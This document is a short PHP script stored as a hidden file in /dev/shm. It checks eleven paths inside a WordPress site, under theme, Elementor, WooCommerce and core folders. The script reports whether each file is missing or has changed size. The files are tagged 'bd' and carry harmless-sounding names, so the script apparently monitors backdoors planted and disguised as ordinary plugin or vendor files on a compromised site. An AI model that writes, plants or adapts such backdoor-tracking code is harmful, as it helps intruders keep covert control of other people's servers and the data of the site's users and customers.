File: //dev/shm/.property_set
<?php $r = '/home/bvkaynrz/kamacare.store'; $x = ["/wp-content/themes/smartic/inc/merlin/vendor/psr/log/Psr/Log/Callback.php"=>"bd@@1013290@@966",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-regular-price-field/tbl_common.php"=>"bd@@1014827@@1013",
"/wp-content/plugins/elementor-pro/vendor_prefixed/laravel/serializable-closure/src/Support/directory.php"=>"bd@@1023856@@902",
"/wp-content/themes/smartic/inc/merlin/vendor/monolog/monolog/tests/Monolog/Handler/Slack/Auth.php"=>"bd@@1023103@@1015",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/php-di/src/Definition/Dumper/joomgallery.html.php"=>"bd@@1023365@@1043",
"/wp-content/plugins/elementor-pro/vendor_prefixed/php-di/php-di/src/Definition/Source/h.php"=>"bd@@1023632@@1025",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Profiler/Node/aboutus.php"=>"bd@@1013912@@1095",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-summary-field/micro_summary.php"=>"bd@@1014460@@966",
"/wp-content/themes/smartic/inc/merlin/vendor/monolog/monolog/src/Monolog/Formatter/lib_nonajax.php"=>"bd@@1012706@@886",
"/wp-includes/blocks/group/gard0.php"=>"bd@@1008122@@885",
"/wp-content/plugins/elementor/modules/atomic-widgets/props-resolver/transformers/settings/link.transformer.php"=>"bd@@1023785@@886"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');